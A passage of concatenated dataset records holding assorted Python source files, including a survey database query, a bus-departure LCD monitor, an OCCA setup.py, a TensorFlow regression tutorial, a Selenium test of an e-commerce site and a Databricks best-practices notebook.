fetch_user_basic_physiology(self, account_id, source_id):\n \"\"\"Given an account and source ID, obtain basic physiology properties\n\n Parameters\n ----------\n account_id : str, UUID\n The account UUID\n source_id : str, UUID\n The source UUID\n\n Notes\n -----\n The original intention with this method was to provide basic host\n detail to Viocare for the reports they produce. By default,\n Viocare interprets height and weight as standard.\n\n Returns\n -------\n tuple, (int or None, int or None, float or None, float or None)\n The tuple contents are (birth year, gender, height, weight).\n \"\"\"\n UNSPECIFIED = 'Unspecified'\n\n with self._transaction.cursor() as cur:\n # from survey_answers for non-free text fields\n cur.execute(\"\"\"SELECT question_shortname, q.response\n FROM ag_login_surveys AS s\n JOIN survey_answers AS q\n ON s.survey_id = q.survey_id\n JOIN survey_question\n USING (survey_question_id)\n WHERE question_shortname IN (\n 'HEIGHT_UNITS',\n 'WEIGHT_UNITS',\n 'BIRTH_YEAR',\n 'GENDER')\n AND s.ag_login_id = %s\n and s.source_id = %s\"\"\",\n (account_id, source_id))\n\n results = {name: value for name, value in cur.fetchall()}\n birth_year = results.get('BIRTH_YEAR')\n gender = results.get('GENDER')\n height_units = results.get('HEIGHT_UNITS')\n weight_units = results.get('WEIGHT_UNITS')\n\n # from survey_answers_other for height/weight\n cur.execute(\"\"\"SELECT question_shortname, q.response\n FROM ag_login_surveys AS s\n JOIN survey_answers_other AS q\n ON s.survey_id = q.survey_id\n JOIN survey_question\n USING (survey_question_id)\n WHERE question_shortname IN (\n 'HEIGHT_CM',\n 'WEIGHT_KG')\n AND s.ag_login_id = %s\n and s.source_id = %s\"\"\",\n (account_id, source_id))\n\n results = {name: value for name, value in cur.fetchall()}\n height = results.get('HEIGHT_CM')\n weight = results.get('WEIGHT_KG')\n\n # normalize the return values\n if birth_year is not None and birth_year.isdigit():\n birth_year = int(birth_year)\n else:\n birth_year = None\n\n if gender is not None and gender == UNSPECIFIED:\n gender = None\n\n # This sucks.\n if height == UNSPECIFIED or weight_units == UNSPECIFIED:\n height = None\n elif height is not None:\n if height.startswith('['):\n # old survey_answers_other responses are of the form\n # '[\"foo\"]' :/\n # TODO: patch all old answers to remove extraneous [\"\"]?\n height = height[2:-2]\n\n if height == \"\":\n height = None\n else:\n height = float(height)\n if height_units == 'centimeters':\n # to inches\n height = height / 2.54\n else:\n # should not occur but just in case\n height = None\n\n if weight == UNSPECIFIED or weight_units == UNSPECIFIED:\n weight = None\n elif weight is not None:\n if weight.startswith('['):\n # old survey_answers_other responses are of the form\n # '[\"foo\"]' :/\n weight = weight[2:-2]\n if weight == \"\":\n weight = None\n else:\n weight = float(weight)\n if weight_units == 'kilograms':\n # to pounds\n weight = weight * 2.20462\n else:\n # should not occur but just in case\n weight = None\n\n return (birth_year, gender, height, weight)\n","sub_path":"microsetta_private_api/repo/survey_template_repo.py","file_name":"survey_template_repo.py","file_ext":"py","file_size_in_byte":16104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"326186606","text":"import urllib.request\nimport json\nfrom datetime import datetime\nimport time\nimport Adafruit_CharLCD as LCD\n\nstoppesteder = {\n 'Lakkegata Skole': '3010532'\n}\n\nlcd = LCD.Adafruit_CharLCDPlate()\nlcd.set_color(0.0, 0.0, 0.0)\n\nlcd.clear()\nlcd.message(\"Loading...\")\n\ndef refresh(skole):\n data = urllib.request.urlopen(\"http://reisapi.ruter.no/StopVisit/GetDepartures/3010532\").read().decode(\"utf8\")\n parsed = json.loads(data)\n\n now = datetime.now()\n\n avganger = []\n\n for avgang in range(2):\n avgangData = parsed[avgang]['MonitoredVehicleJourney']\n\n destinasjon = avgangData['DestinationName']\n linjenummer = avgangData['PublishedLineName']\n vogntype = avgangData['VehicleMode'] #3 = trikk?\n avgangstid = datetime.strptime(avgangData['MonitoredCall']['ExpectedDepartureTime'].split(\"+\")[0].split(\".\")[0], \"%Y-%m-%dT%H:%M:%S\") #2018-08-22T16:40:00\n eta = avgangstid - now\n retning = int(avgangData[\"DirectionRef\"])\n \n if retning == 2:\n avganger.append({\n 'destinasjon': destinasjon,\n 'linjenummer': linjenummer,\n 'vogntype': vogntype,\n 'avganstid': avgangstid,\n 'eta': eta\n })\n \n return avganger\n\nmonitoring = True\nwhile monitoring:\n avganger = refresh(\"Lakkegata Skole\")\n\n payload = \"\"\n\n for linje in range(min(2, len(avganger))):\n avgang = avganger[linje]\n\n preDest = str(avgang['linjenummer']) + \" \"\n postDest = \" \" + str(int((datetime(1,1,1) + avgang['eta']).strftime('%M'))) + \"m\"\n destPad = avgang[\"destinasjon\"][:(16 - (len(preDest) + len(postDest)))] + \" \" * (16 - (len(preDest) + len(postDest) + len(avgang[\"destinasjon\"])))\n payload += preDest + destPad + postDest + \"\\n\"\n \n lcd.clear()\n lcd.message(payload)\n print(payload)\n\n time.sleep(30)","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"272362765","text":"#!/usr/bin/env python3\n#\n# The MIT License (MIT)\n#\n# Copyright (c) 2018 David Medina\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n#\n\nfrom setuptools.command import build_ext\nfrom setuptools import setup, find_packages, Extension\nimport os\nimport sys\nimport numpy as np\n\n\nclass OccaInstaller(build_ext.build_ext):\n '''Compile occa.git'''\n\n def sys_call(self, command):\n self.spawn(command.split(' '))\n\n def pre_build(self):\n # Build occa and copy libocca.so to occa/c\n self.sys_call('make -C occa.git -j4')\n\n def post_build(self):\n # Change the rpath location for finding libocca.so\n occa_c_path = os.path.dirname(self.get_ext_fullpath('occa.c.device'))\n libocca_so = os.path.abspath('./occa.git/lib/libocca.so')\n\n # Copy libocca.so to build directory\n self.copy_file('occa.git/lib/libocca.so', occa_c_path)\n\n if sys.platform == 'darwin':\n for output in self.get_outputs():\n self.sys_call('install_name_tool'\n ' -change'\n ' {libocca_so}'\n ' @loader_path/libocca.so'\n ' {output}'.format(libocca_so=libocca_so,\n output=output))\n\n def run(self):\n self.pre_build()\n build_ext.build_ext.run(self)\n self.post_build()\n\n\ndef get_ext_module(module):\n return Extension(\n name='occa.c.{module}'.format(module=module),\n sources=['occa/c/{module}.cpp'.format(module=module)],\n include_dirs=[\n 'occa/c',\n 'occa.git/include',\n np.get_include(),\n ],\n depends=['occa/c/libocca.so'],\n libraries=['occa'],\n library_dirs=['occa.git/lib'],\n extra_compile_args=['-Wno-unused-function'],\n extra_link_args=['-Wl,-rpath,$ORIGIN'],\n )\n\n\next_modules = [\n get_ext_module(module)\n for module in ['device', 'exception', 'kernel', 'memory']\n]\n\n\npackage_data = {\n 'occa.c': ['*.so'],\n}\n\n\nlong_description = ('''\nIn a nutshell, OCCA (like oca-rina) is an open-source library which aims to:\n\n- Make it easy to program different types of devices (e.g. CPU, GPU, FPGA)\n\n- Provide a unified API for interacting with backend device APIs (e.g. OpenMP, CUDA, OpenCL)\n\n- Use just-in-time compilation to build backend kernels\n\n- Provide a kernel language, a minor extension to C, to abstract programming for each backend\n''')\n\n\nsetup(\n name='occa',\n version='0.2.0',\n description='Portable Approach for Parallel Architectures',\n long_description=long_description,\n url='https://libocca.org',\n author='David Medina',\n cmdclass={\n 'build_ext': OccaInstaller,\n },\n packages=find_packages(),\n ext_modules=ext_modules,\n package_data=package_data,\n zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"71909655","text":"\"\"\"\nClasses of the places in the game.\n\nBase class is places.Base()\n\"\"\"\n\nfrom os.path import dirname, basename, isfile, join\nimport glob\nimport importlib\n\nmodules = glob.glob(join(dirname(__file__), \"*.py\"))\nfiles = [ basename(f)[:-3] for f in modules if isfile(f) and not f.endswith('__init__.py')]\nfor element in files:\n module = importlib.import_module(f\"places.{element}\")\n globals().update(\n {n: getattr(module, n) for n in module.__all__} if hasattr(module, '__all__') \n else \n {k: v for (k, v) in module.__dict__.items() if not k.startswith('_')\n })\n\nprint(\"Importing places...\")\ncount = 0\nfor element in files:\n count+=1\n print(f\"{count}. {element} loaded!\")\n\nprint(\"__________________________________________\")\n","sub_path":"places/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"482681938","text":"#!/usr/bin/env python3\n\nimport argparse\n\nif __name__ == \"__main__\":\n # Argument Parsing\n parser = argparse.ArgumentParser(description=\"Print 'Hello World'\")\n parser.add_argument(\"--version\", action=\"version\", version=\"%(prog)s 2.0\")\n args = parser.parse_args()\n\n print(\"Hello World\")\n","sub_path":"hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48168900","text":"# Loading the required packages\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Function to normalize the input data(array form)\ndef Normalize(x):\n mean = np.mean(x)\n standard_deviation = np.std(x)\n X = (x - mean)/standard_deviation\n return X\n\n'''\nHere we are building the computational graph\n'''\n# Now we load the boston house price dataset using tensorflow contrib Datasets\n# Separate the data into X_train and Y_train\nboston_dataset = tf.contrib.learn.datasets.load_dataset('boston')\nprint(boston_dataset.data.shape)\n# By 5 means out of 13 columns(features) we are only taking one into consideration\nX_train , Y_train = boston_dataset.data[:,5] , boston_dataset.target\nprint(X_train.shape , Y_train.shape)\n# So we see we have 506 samples of training data\nX_train = Normalize(X_train)\nn_samples = len(X_train)\n\n# Placeholder for storing the training data\nX = tf.placeholder(tf.float32 , name = 'X')\nY = tf.placeholder(tf.float32 , name = 'Y')\n\n# Assigning weights and biases to 0\nw = tf.Variable(0.0 , name = 'weight')\nb = tf.Variable(0.0 , name = 'biases')\n\n# Linear Regression Model for prediction\ny_hat = X*w + b\n\n# Loss function\nloss = tf.square( Y - y_hat, name = 'loss')\n\n# Gradient descent optimiter for minimizing loss\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01).minimize(loss)\n\n# Initializing variables\ninit = tf.global_variables_initializer()\ntotal = []\n\n'''\nDone building the computational graph\n'''\n\n'''\nUse of zip\n\n# initializing list of players. \nplayers = [ \"Sachin\", \"Sehwag\", \"Gambhir\", \"Dravid\", \"Raina\" ] \n# initializing their scores \nscores = [100, 15, 17, 28, 43 ] \n# printing players and scores. \nfor pl, sc in zip(players, scores): \n print (\"Player : %s Score : %d\" %(pl, sc)) \nOutput:\n\nPlayer : Sachin Score : 100\nPlayer : Sehwag Score : 15\nPlayer : Gambhir Score : 17\nPlayer : Dravid Score : 28\nPlayer : Raina Score : 43\n'''\n\nno_of_epochs = 100\nwith tf.Session() as sess:\n # initializing the variables\n sess.run(init)\n # for visualization in tensorboard\n writer = tf.summary.FileWriter('graphs' , sess.graph)\n for i in range(no_of_epochs):\n total_loss = 0\n for x,y in zip(X_train , Y_train):\n # _ because we dont want to store optimizers value\n _ , l = sess.run([optimizer , loss] , feed_dict = {X : x , Y : y})\n # we are calculating total loss for all the sample of data going through them one by one\n # In multiple regression we multiply the data all at once in a matrix\n total_loss += l\n # we divide by n_samples we are going through each sample in above for loop and then adding the loss\n total.append(total_loss/n_samples)\n print('Epoch {0} : Loss {1}'.format(i , total_loss/n_samples))\n writer.close()\n # getting the value of weight and bias after 100 epochs\n w_value , b_value = sess.run([w , b])\n\nY_pred = X_train*w_value + b_value\nprint('done')\n\n# Plotting the result\nplt.plot(X_train, Y_train, 'bo', label='Real Data')\nplt.plot(X_train,Y_pred, 'r', label='Predicted Data')\nplt.legend()\nplt.show()\n\nplt.plot(total)\nplt.show()\n\n# Loss gets stuck at one value due to normalization comment it and see the results\n# Also see multiple regression example for clearer concept\n","sub_path":"Tensorflow Codes/LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"407027689","text":"import time\r\nimport json\r\n\r\nimport pypyodbc\r\nfrom datetime import datetime\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.remote.webelement import WebElement\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions\r\nfrom selenium.webdriver.support.select import Select\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\r\nimport pytest\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nimport webbrowser\r\n\r\n\r\n\r\nclass TestTrendyol():\r\n def setup_method(self, method):\r\n self.driver = webdriver.Firefox()\r\n self.vars = {}\r\n\r\n def teardown_method(self, method):\r\n self.driver.quit()\r\n\r\n def test_login(self):\r\n conn = pypyodbc.connect(\r\n \"Driver={SQL Server Native Client 11.0};\"\r\n \"Server=DESKTOP-I3V9S4O\\SQLEXPRESS01;\"\r\n \"Database=telefonrehber;\"\r\n \"Trusted_Connection=yes;\"\r\n )\r\n cursor = conn.cursor()\r\n datetime.now()\r\n sql = \"INSERT INTO testresults (Gerçekleştiren_Kişi, Tanım, Açıklama,Durum,Öncelik,dtarih) VALUES(?,?,?,?,?,?)\"\r\n wait = WebDriverWait(self.driver, 20)\r\n self.driver.get(\"https://www.trendyol.com\")\r\n\r\n wait.until(EC.element_to_be_clickable((By.CLASS_NAME, \"modal-close\"))).click()\r\n wait.until(EC.element_to_be_clickable((By.CLASS_NAME, \"close-button\"))).click()\r\n\r\n actualUrl = \"https://www.trendyol.com/\"\r\n expected = self.driver.current_url\r\n # self.assertEqual(actualUrl, expected)\r\n\r\n if (actualUrl == expected):\r\n print(\"Welcome\")\r\n values = (\"Tester1\", \"SiteyeGiris\", \"SiteyeGirisBasarili\", \"Basarili\", \"-\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n else:\r\n print(\"Fail\")\r\n values = (\"Tester1\", \"SiteyeGiris\", \"SiteyeGirisBaşarisiz\", \"Basarisiz\", \"-\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n\r\n login: WebElement = self.driver.find_element_by_css_selector(\".account-user > .link-text\")\r\n login.click()\r\n username: WebElement = self.driver.find_element_by_id(\"login-email\")\r\n password: WebElement = self.driver.find_element_by_id(\"login-password-input\")\r\n\r\n username.send_keys(\"asdasdasdsefa@gmail.com\")\r\n password.send_keys(\"testhesabı00\")\r\n gir: WebElement = self.driver.find_element_by_xpath(\r\n \"//div[@id='login-register']/div[3]/div/form/button/span\").click()\r\n actualUrl1 = \"https://www.trendyol.com/giris?cb=https%3A%2F%2Fwww.trendyol.com%2Fbutik%2Fliste%2F2%2Ferkek\"\r\n expected1 = self.driver.current_url\r\n # self.assertEqual(actualUrl, expected)\r\n if (actualUrl1 == expected1):\r\n print(\"Giris Basarılı\")\r\n values = (\"Tester1\", \"ÜyeGiris\", \"ÜyeGirisBasarili\", \"Basarili\", \"Test1\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n else:\r\n print(\"Giriş Başarısız.\")\r\n values = (\"Tester1\", \"ÜyeGiris\", \"ÜyeGirisBaşarisiz\", \"Basarisiz\", \"Test1\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n\r\n\r\n time.sleep(2)\r\n self.driver.find_element(By.CSS_SELECTOR, \".search-box\").send_keys(\"samsung s20\")\r\n time.sleep(2)\r\n self.driver.find_element(By.CSS_SELECTOR, \".search-icon\").click()\r\n time.sleep(2)\r\n\r\n actualUrl2 = \"https://www.trendyol.com/sr?q=samsung%20s20&qt=samsung%20s20&st=samsung%20s20&os=1\"\r\n\r\n expected2 = self.driver.current_url\r\n\r\n # self.assertEqual(actualUrl, expected)\r\n if (actualUrl2 == expected2):\r\n print(\"Doğru Ürün Araması\")\r\n values = (\"Tester1\", \"ÜrünArama\", \"Dogru Ürün Arandi\", \"Basarili\", \"Test2\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n else:\r\n print(\"Yanlış Ürün Araması\")\r\n values = (\"Tester1\", \"ÜrünArama\", \"Ürün Aramasinda Hata\", \"Basarisiz\", \"Test2\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n\r\n\r\n time.sleep(5)\r\n self.driver.find_element(By.CSS_SELECTOR, \"[data-id='78348960']\").click()\r\n\r\n select = Select(self.driver.find_element_by_css_selector('select'))\r\n time.sleep(2)\r\n select.select_by_value('PRICE_BY_ASC')\r\n time.sleep(2)\r\n actualUrl3 = \"https://www.trendyol.com/sr?q=samsung+s20&qt=samsung+s20&st=samsung+s20&sst=PRICE_BY_ASC\"\r\n expected3 = self.driver.current_url\r\n\r\n # self.assertEqual(actualUrl, expected)\r\n if (actualUrl3 == expected3):\r\n print(\"Ürünler doğru sıralandı\")\r\n values = (\"Tester1\", \"ÜrünSiralama\", \"Ürünler Dogru Siralandi\", \"Basarili\", \"Test3\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n else:\r\n print(\"Ürünler yanlış sıralandı\")\r\n values = (\"Tester1\", \"ÜrünSiralama\", \"Ürünler Yanlis Siralandi\", \"Basarisiz\", \"Test3\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n time.sleep(2)\r\n\r\n self.driver.find_element(By.CSS_SELECTOR, \"[data-id='52681989']\").click()\r\n time.sleep(2)\r\n tab_list = self.driver.window_handles\r\n self.driver.switch_to.window(tab_list[1])\r\n actualUrl4 = \"https://www.trendyol.com/samsung/m4025-d204-drum-unitesi-chip-p-52681989?boutiqueId=61&merchantId=198613\"\r\n expected4 = self.driver.current_url\r\n\r\n # self.assertEqual(actualUrl, expected)\r\n if (actualUrl4 == expected4):\r\n print(\"Doğru Ürün Seçildi\")\r\n values = (\"Tester1\", \"ÜrünSecim\", \"Ürün Dogru Secildi\", \"Basarili\", \"Test4\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n else:\r\n print(\"Yanlış Ürün Seçildi\")\r\n values = (\"Tester1\", \"ÜrünSecim\", \"Ürün Yanlıs Secildi\", \"Basarisiz\", \"Test4\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n time.sleep(2)\r\n self.driver.find_element_by_class_name(\"add-to-basket\").click()\r\n\r\n time.sleep(2)\r\n sepet: WebElement = self.driver.find_element_by_css_selector(\".account-basket > .link-text\")\r\n sepet.click()\r\n time.sleep(2)\r\n actualUrl5 = \"https://www.trendyol.com/sepet\"\r\n expected5 = self.driver.current_url\r\n # self.assertEqual(actualUrl, expected)\r\n if (actualUrl5 == expected5):\r\n print(\"Ürün Başarıyla Sepete Eklendi\")\r\n values = (\"Tester1\", \"Sepete Ekle\", \"Ürün Sepete Basariyla Eklendi\", \"Basarili\", \"Test5\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n else:\r\n print(\"Ürün Sepete Eklenemedi\")\r\n values = (\"Tester1\", \"Sepete Ekle\", \"Ürün Sepete Eklenemedi\", \"Basarisiz\", \"Test5\", datetime.now())\r\n cursor.execute(sql, values)\r\n conn.commit()\r\n\r\n select_employee = \"SELECT * FROM testresults\"\r\n cursor = conn.cursor()\r\n cursor.execute(select_employee)\r\n result = cursor.fetchall()\r\n\r\n p = []\r\n tbl = \"IDGerçeklestirenKisiTanimAciklamaDurumOncelikdTarih\"\r\n p.append(tbl)\r\n\r\n for row in result:\r\n a = \"%s\"%row[0]\r\n p.append(a)\r\n b = \"%s\"%row[1]\r\n p.append(b)\r\n c = \"%s\"%row[2]\r\n p.append(c)\r\n d = \"%s\"%row[3]\r\n p.append(d)\r\n e = \"%s\"%row[4]\r\n p.append(e)\r\n f = \"%s\"%row[5]\r\n p.append(f)\r\n g = \"%s\"%row[6]\r\n p.append(g)\r\n\r\n contents = '''\r\n \r\n \r\n \r\n Python Webbrowser\r\n \r\n \r\n \r\n %s\r\n
\r\n \r\n \r\n ''' % (p)\r\n filename = 'webbrowser.html'\r\n main(contents, filename)\r\n webbrowser.open(filename)\r\n\r\ndef main(contents, filename):\r\n output = open(filename, \"w\")\r\n output.write(contents)\r\n output.close()\r\n\r\n\r\n","sub_path":"Trendyol.py","file_name":"Trendyol.py","file_ext":"py","file_size_in_byte":8888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"421320044","text":"from Var import *\n\nclass ow :\n def __init__(self,_name,_posX,_posY):\n self._name = _name\n self._posX = _posX\n self._posY = _posY\n\n hero = pygame.image.load(\"icons/\"+_name+\".png\")\n hero = hero.convert_alpha()\n screen.blit(hero, (_posX, _posY))\n\n\n","sub_path":"Overwatch/Function.py","file_name":"Function.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"6522393","text":"import numpy as np\nimport math\nfrom numba import jit\n\n@jit\ndef PSNR(noise, original):\n\theight = original.shape[0]\n\twidth = original.shape[1]\n\t# print(noise.shape, original.shape)\n\tMSE = 0\n\tfor i in range(height):\n\t\tfor j in range(width):\n\t\t\tMSE += math.pow(int(noise[i][j]) - int(original[i][j]), 2)\n\tMSE /= (height * width)\n\treturn (10 * math.log(255 * 255 / MSE, 10))\n","sub_path":"Final Project/PSNR.py","file_name":"PSNR.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"140502139","text":"# Databricks notebook source\n# MAGIC %md ## Notebook Best Practices\n# MAGIC \n# MAGIC A list of things to consider when creating notebooks for prototyping or production.test changes. test123455\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC _Any fool can write code that a computer can understand. Good programmers write code that humans can understand_ - Kent Beck, 1999\n# MAGIC \n# MAGIC _Any fool can write code that a computer can understand. Good **data engineers and scientists** write code that humans can understand_ - Anonymous, 2018\n\n# COMMAND ----------\n\n# MAGIC %md #### Principles\n# MAGIC \n# MAGIC * First make it **Work**\n# MAGIC * Then make it **Right**\n# MAGIC * Then make it **Fast**, **Small** and **Maintainable**\n\n# COMMAND ----------\n\n# MAGIC %md #### 1. Naming Good and Bad\n\n# COMMAND ----------\n\ninsurance_claims_data = spark.read.parquet(\"dbfs:/FileStore/databricks-abhinav/insurance/claims\")\n\n# Use meaningful, contextual, searchable names for your dataframes, variables etc.\n\n# COMMAND ----------\n\n# MAGIC %md #### 2. Readable code and comments\n\n# COMMAND ----------\n\n# DBTITLE 1,Specify the schema for insurance claims data\nfrom pyspark.sql.types import *\n\ninsurance_claims_schema = (StructType().\n add(\"months_as_customer\", IntegerType()).add(\"age\", IntegerType()).\n add(\"policy_number\", IntegerType()).add(\"policy_bind_date\", StringType()).\n add(\"policy_state\", StringType()).add(\"policy_csl\", StringType()).\n add(\"policy_deductible\", IntegerType()).add(\"policy_annual_premium\", DoubleType()).\n add(\"umbrella_limit\", IntegerType()).add(\"insured_zip\", IntegerType()).\n add(\"insured_sex\", StringType()).add(\"insured_education_level\", StringType()).\n add(\"insured_occupation\", StringType()).add(\"insured_hobbies\", StringType()).\n add(\"insured_relationship\", StringType()).add(\"capital_gains\", IntegerType()).\n add(\"capital_loss\", IntegerType()).add(\"incident_date\", StringType()).\n add(\"incident_type\", StringType()).add(\"collision_type\", StringType()).\n add(\"incident_severity\", StringType()).add(\"authorities_contacted\", StringType()).\n add(\"incident_state\", StringType()).add(\"incident_city\", StringType()).\n add(\"incident_location\", StringType()).add(\"incident_hour_of_the_day\", IntegerType()).\n add(\"number_of_vehicles_involved\", IntegerType()).add(\"property_damage\", StringType()).\n add(\"bodily_injuries\", IntegerType()).add(\"witnesses\", IntegerType()).\n add(\"police_report_available_\", StringType()).add(\"total_claim_amount\", IntegerType()).\n add(\"injury_claim\", IntegerType()).add(\"property_claim\", IntegerType()).\n add(\"vehicle_claim\", IntegerType()).add(\"auto_make\", StringType()).\n add(\"auto_model\", StringType()).add(\"auto_year\", IntegerType()).\n add(\"class_label\", StringType())\n )\n\n# COMMAND ----------\n\n# MAGIC %scala\n# MAGIC \n# MAGIC val r = 10\n\n# COMMAND ----------\n\n# DBTITLE 1,Extract claims data into dataframe and display\ninsurance_claims_data_raw = (spark.read.csv(\"dbfs:/FileStore/tables/insurance_claims.csv\", \n schema=insurance_claims_schema, header=True, \n ignoreLeadingWhiteSpace=True, \n ignoreTrailingWhiteSpace=True,\n nullValue='?'))\n\ninsurance_claims_data_filled = insurance_claims_data_raw.na.fill({'property_damage': 'NA', \n 'police_report_available_': 'NA', \n \"collision_type\": 'NA'})\n\ndisplay(insurance_claims_data_filled)\n\n# COMMAND ----------\n\npd = spark.sql(\"select * from adults\")\ndisplay(pd)\n\n# COMMAND ----------\n\n# MAGIC %md #### 3. Single Responsibility/Cohesion and Interface Segregation\n\n# COMMAND ----------\n\n# DBTITLE 1,Package cell with a super-loaded trait and implementations\n# MAGIC %scala\n# MAGIC \n# MAGIC package com.databricks.abhinav.messy\n# MAGIC \n# MAGIC trait ThisIsAnInterface {\n# MAGIC def doThisOneThing:Double\n# MAGIC def doThisSecondThing:Double\n# MAGIC def doThisTooPlease:String\n# MAGIC def mightDoThisAsWellWhenWeAreHere:String\n# MAGIC def whatTheHeckWhoCares:Integer\n# MAGIC }\n# MAGIC \n# MAGIC class ThisIsClassOne(size:Double) extends ThisIsAnInterface {\n# MAGIC def doThisOneThing:Double = { size * size }\n# MAGIC def doThisSecondThing:Double = { size * size * size }\n# MAGIC def doThisTooPlease:String = \"Probably makes sense\"\n# MAGIC def mightDoThisAsWellWhenWeAreHere:String = throw new UnsupportedOperationException\n# MAGIC def whatTheHeckWhoCares:Integer = throw new UnsupportedOperationException\n# MAGIC }\n# MAGIC \n# MAGIC class ThisIsClassTwo(message:String) extends ThisIsAnInterface {\n# MAGIC def doThisOneThing:Double = throw new UnsupportedOperationException\n# MAGIC def doThisSecondThing:Double = throw new UnsupportedOperationException\n# MAGIC def doThisTooPlease:String = \"Probably makes sense here too\"\n# MAGIC def mightDoThisAsWellWhenWeAreHere:String = \"Replaying the \" + message\n# MAGIC def whatTheHeckWhoCares:Integer = message.length\n# MAGIC }\n\n# COMMAND ----------\n\n# DBTITLE 1,Package cell respecting SOLID principles\n# MAGIC %scala\n# MAGIC \n# MAGIC package com.databricks.abhinav.better\n# MAGIC \n# MAGIC trait ThisIsInterfaceOne {\n# MAGIC def doThisOneThing:Double\n# MAGIC def doThisSecondThing:Double\n# MAGIC }\n# MAGIC \n# MAGIC trait ThisIsInterfaceTwo {\n# MAGIC def thisMakesSense:String\n# MAGIC }\n# MAGIC \n# MAGIC trait ThisIsInterfaceThree {\n# MAGIC def doThisSpecificThing:String\n# MAGIC def doThisSecondSpecificThing:Integer\n# MAGIC }\n# MAGIC \n# MAGIC class ThisIsClassOne(size:Double) extends ThisIsInterfaceOne with ThisIsInterfaceTwo {\n# MAGIC def doThisOneThing:Double = { size * size }\n# MAGIC def doThisSecondThing:Double = { size * size * size }\n# MAGIC def thisMakesSense:String = \"Probably makes sense\"\n# MAGIC }\n# MAGIC \n# MAGIC class ThisIsClassTwo(message:String) extends ThisIsInterfaceThree with ThisIsInterfaceTwo {\n# MAGIC def doThisSpecificThing:String = \"Replaying the \" + message\n# MAGIC def doThisSecondSpecificThing:Integer = message.length\n# MAGIC def thisMakesSense:String = \"Probably makes sense here too\"\n# MAGIC }\n\n# COMMAND ----------\n\n# MAGIC %md #### 4. Reuse code, keep it small, and use Notebook workflows\n\n# COMMAND ----------\n\n# DBTITLE 1,Read limited data from insurance claims table\ninsurance_claims_data = spark.sql(\"SELECT * \\\n FROM INSURANCE_DB.INSURANCE_CLAIMS_TBL \\\n LIMIT 1000\")\n\n# COMMAND ----------\n\n# MAGIC %md #### 5. Unit test your code\n\n# COMMAND ----------\n\n# DBTITLE 1,Read limited data from insurance claims table and validate row count\ninsurance_claims_data = spark.sql(\"SELECT * \\\n FROM INSURANCE_DB.INSURANCE_CLAIMS_TBL \\\n LIMIT 1000\")\n\nassert insurance_claims_data.count() == 4000\n\n# COMMAND ----------\n\ndbutils.notebook.exit(\"SUCCESS\")\n\n# COMMAND ----------\n\nprint(\"test6\")","sub_path":"notebooks/Users/lei.pan@databricks.com/CICDPipeline/Staging/notebook_test.py","file_name":"notebook_test.py","file_ext":"py","file_size_in_byte":7120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 